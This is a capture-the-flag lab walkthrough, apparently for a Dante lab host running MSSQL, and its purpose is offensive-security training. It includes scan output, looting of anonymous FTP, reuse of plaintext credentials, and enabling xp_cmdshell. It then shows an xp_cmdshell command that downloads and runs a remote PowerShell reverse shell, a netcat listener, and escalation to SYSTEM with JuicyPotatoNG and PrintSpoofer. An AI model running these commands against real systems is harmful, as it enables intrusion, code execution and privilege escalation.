Rustscan

rustscan -a 172.16.1.5 --ulimit 5000 -- -Pn -sV --script vuln

Everything after `--` is handed to nmap. Note that the vulners entries listed under 1433 and 49673 below are CPE matches on the version banner (15.00.2000) only; they are not verified findings.
Open 172.16.1.5:21
Open 172.16.1.5:111
Open 172.16.1.5:135
Open 172.16.1.5:139
Open 172.16.1.5:445
Open 172.16.1.5:1433
Open 172.16.1.5:2049
Open 172.16.1.5:5985
Open 172.16.1.5:47001
Open 172.16.1.5:49673
Open 172.16.1.5:49665
Open 172.16.1.5:49666
Open 172.16.1.5:49664
Open 172.16.1.5:49677
Open 172.16.1.5:49678
Open 172.16.1.5:49680
Open 172.16.1.5:49679
PORT      STATE SERVICE      REASON  VERSION
21/tcp    open  ftp          syn-ack FileZilla ftpd
111/tcp   open  rpcbind      syn-ack 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s     syn-ack Microsoft SQL Server 2019 15.00.2000
| vulners:
|   cpe:/a:microsoft:sql_server:2019:
|     	CVE-2023-23384	7.5	https://vulners.com/cve/CVE-2023-23384
|     	DF707FE2-EC27-5541-BC6A-6C7A0E9CC454	6.5	https://vulners.com/githubexploit/DF707FE2-EC27-5541-BC6A-6C7A0E9CC454	*EXPLOIT*
|     	CVE-2023-21713	6.5	https://vulners.com/cve/CVE-2023-21713
|     	CVE-2023-21705	6.5	https://vulners.com/cve/CVE-2023-21705
|     	CVE-2021-1636	6.5	https://vulners.com/cve/CVE-2021-1636
|     	CVE-2022-29143	6.0	https://vulners.com/cve/CVE-2022-29143
|     	CVE-2023-21718	4.4	https://vulners.com/cve/CVE-2023-21718
|     	CVE-2023-21704	4.3	https://vulners.com/cve/CVE-2023-21704
|_    	CVE-2023-21528	4.3	https://vulners.com/cve/CVE-2023-21528
2049/tcp  open  mountd       syn-ack 1-3 (RPC #100005)
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
47001/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        syn-ack Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack Microsoft Windows RPC
49673/tcp open  ms-sql-s     syn-ack Microsoft SQL Server 2019 15.00.2000
| vulners:
|   cpe:/a:microsoft:sql_server:2019:
|     	CVE-2023-23384	7.5	https://vulners.com/cve/CVE-2023-23384
|     	DF707FE2-EC27-5541-BC6A-6C7A0E9CC454	6.5	https://vulners.com/githubexploit/DF707FE2-EC27-5541-BC6A-6C7A0E9CC454	*EXPLOIT*
|     	CVE-2023-21713	6.5	https://vulners.com/cve/CVE-2023-21713
|     	CVE-2023-21705	6.5	https://vulners.com/cve/CVE-2023-21705
|     	CVE-2021-1636	6.5	https://vulners.com/cve/CVE-2021-1636
|     	CVE-2022-29143	6.0	https://vulners.com/cve/CVE-2022-29143
|     	CVE-2023-21718	4.4	https://vulners.com/cve/CVE-2023-21718
|     	CVE-2023-21704	4.3	https://vulners.com/cve/CVE-2023-21704
|_    	CVE-2023-21528	4.3	https://vulners.com/cve/CVE-2023-21528
49677/tcp open  msrpc        syn-ack Microsoft Windows RPC
49678/tcp open  msrpc        syn-ack Microsoft Windows RPC
49679/tcp open  msrpc        syn-ack Microsoft Windows RPC
49680/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

FTP

Anonymous login is allowed on the FileZilla FTP service; log in as anonymous/anonymous and pull everything in the directory:

ftp 172.16.1.5
anonymous
anonymous
mget *

Got the flag

DANTE{Ther3s_M0r3_to_pwn_so_k33p_searching!}

Found creds for sophie on NIX06

Login to the MSSQL instance on SQL01 with impacket-mssqlclient (sophie's password from NIX06 is reused here as a SQL login; if a login is a Windows/domain account instead, add -windows-auth):

impacket-mssqlclient dante.local/sophie:TerrorInflictPurpleDirt996655@172.16.1.5

MSSQL Enumeration

select @@version;

# Check whether xp_cmdshell is enabled (value_in_use = 1 means it is active)

SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# Turn on advanced options; this is required before xp_cmdshell can be configured.
# Changing either setting needs ALTER SETTINGS, i.e. sysadmin or serveradmin.

sp_configure 'show advanced options', '1'

RECONFIGURE

# Enable xp_cmdshell

sp_configure 'xp_cmdshell', '1'

RECONFIGURE

# One-liner. EXEC is required here because only the first statement of a batch may call a procedure without it.
# (impacket-mssqlclient also has built-in enable_xp_cmdshell and xp_cmdshell <cmd> commands.)

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Quickly check which account the SQL Server service runs as via xp_cmdshell

EXEC master..xp_cmdshell 'whoami'


# Get rev shell

EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.45.195:80/large1.ps1") | powershell -noprofile'
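The enumeration steps above collapsed into one T-SQL batch, as an added worked example that is not part of the original writeup: it first checks whether the login can actually change the setting, enables xp_cmdshell only when it is off, then pulls out of `whoami /priv` exactly the token privileges that decide the privilege-escalation route, and finally shows the trace the change leaves in the SQL Server error log. It assumes a sysadmin-capable login on SQL01 and a client that sends a multi-line batch (sqlcmd -i or SSMS); impacket-mssqlclient sends each line as its own batch, so paste it there as a single line or use its built-in enable_xp_cmdshell and xp_cmdshell commands.

```sql
-- Who am I on this instance, and can I flip xp_cmdshell at all?
-- sp_configure needs ALTER SETTINGS, held by sysadmin and serveradmin.
SELECT SYSTEM_USER                      AS login_name,
       IS_SRVROLEMEMBER('sysadmin')     AS is_sysadmin,
       IS_SRVROLEMEMBER('serveradmin')  AS is_serveradmin;

-- Current state: value = configured, value_in_use = what is active now
-- (the two differ until RECONFIGURE has run).
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- Enable only if it is off. Every change is written to the SQL Server
-- error log ("Configuration option 'xp_cmdshell' changed from 0 to 1"),
-- so turn it back off afterwards if footprint matters.
IF (SELECT CAST(value_in_use AS INT)
    FROM sys.configurations WHERE name = 'xp_cmdshell') = 0
BEGIN
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
END;

-- Capture whoami /priv into a table variable and keep only the lines that
-- matter for the next step: SeImpersonatePrivilege or
-- SeAssignPrimaryTokenPrivilege on the service account is what the Potato
-- family and PrintSpoofer rely on.
DECLARE @priv TABLE (id INT IDENTITY(1,1), line NVARCHAR(4000));
INSERT INTO @priv (line) EXEC master..xp_cmdshell 'whoami /priv';
SELECT line
FROM @priv
WHERE line LIKE '%SeImpersonatePrivilege%'
   OR line LIKE '%SeAssignPrimaryTokenPrivilege%';

-- Evidence left behind: search the current error log (0 = current log,
-- 1 = SQL Server log, not the Agent log) for the configuration change.
EXEC master..xp_readerrorlog 0, 1, N'xp_cmdshell';
```

The privilege filter is the check to run before reaching for JuicyPotatoNG or PrintSpoofer: if neither privilege shows up as Enabled, the token-impersonation route used later on this page will not work from this shell.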

Getting the flag

Location: C:\Users\flag.txt

DANTE{Mult1ple_w4Ys_in!}

Priv Esc

As I logged in via the MSSQL service account, I have SeImpersonatePrivilege.

Copying the exploit file onto the box was restricted, so it is executed straight from an SMB share instead (the exploit didn't work). File transfer over SMB:

impacket-smbserver PleaseSub $(pwd) -smb2support

Copy both JuicyPotatoNG.exe and t.bat into the windows-token-abuse directory that smbserver is exporting, then launch it from the target by UNC path (-t * tries both CreateProcessWithTokenW and CreateProcessAsUser, -p is the program to run as SYSTEM):

\\10.10.14.3\PLEASESUB\JuicyPotatoNG.exe -t * -p \\10.10.14.3\PLEASESUB\t.bat

Found DB backups

C:\DB_backups

SHELL> type db_backup.ps1
# Work in progress database backup script. Adapting from mysql backup script. Does not work yet. Do not use.

$password = 'Alltheleavesarebrown1'
$user = 'sophie'
$cred = New-Object System.Net.NetworkCredential($user, $password, "")

$date = Get-Date
$dateString = $date.Year.ToString() + "-" + $date.Month.ToString() + "-" + $date.Day.ToString()

#Create symbolic link for sqldump.exe in the script folder
$sqldumpLocation = ".\sqldump.exe"
$backupDest = "C:\DB_backups\SQL\sql_backup_"+ $dateString + ".sql"

$execute_sqldump = $sqldumpLocation+" -u"+$cred.UserName+" -p"+$cred.Password +" > " + $backupDest


invoke-expression $execute_sqldump


# use 7zip to compress and encrypt the backup with same password as used to autheticate the sql backup user
# removes the unencrypted .sql file afterwards
# create symbolic link for 7z.exe in the script folder
$sevenzip = ".#7z.exe"
$zipfile = $backupDest.Replace(".sql",".7z")
$execute7zip = $sevenzip+" a -t7z "+$zipfile+" "+$backupDest+" -p"+$cred.Password
invoke-expression $execute7zip
Remove-Item $backupDest

Evil-winrm with the password hardcoded in db_backup.ps1 (didn't work)

evil-winrm -i 172.16.1.5 -u sophie -p 'Alltheleavesarebrown1'

The script gives a second credential for sophie (Alltheleavesarebrown1, distinct from the NIX06 password). evil-winrm takes a plaintext password with -p; -H is for an NT hash, and there is no /domain: switch. 5985 is open, but WinRM only admits members of Administrators or Remote Management Users, so a valid password alone is not enough.

Paste the PowerShell reverse-shell one-liner into the shell obtained earlier, with a listener waiting on 4445:

SHELL> powershell -e <base64 payload omitted>
nc -lvnp 4445

Trying JuicyPotatoNG again

\\10.10.14.3\PLEASESUB\JuicyPotatoNG.exe -t * -p \\10.10.14.3\PLEASESUB\t.bat

PrintSpoofer

Run from the PowerShell shell: -i keeps the spawned process interactive, -c is the command to run as SYSTEM.

./PrintSpoofer64.exe -i -c 'C:\DB_backups\t.bat'

Flag

PS C:\Users\Administrator\Desktop> type flag.txt
DANTE{Ju1cy_pot4t03s_in_th3_wild}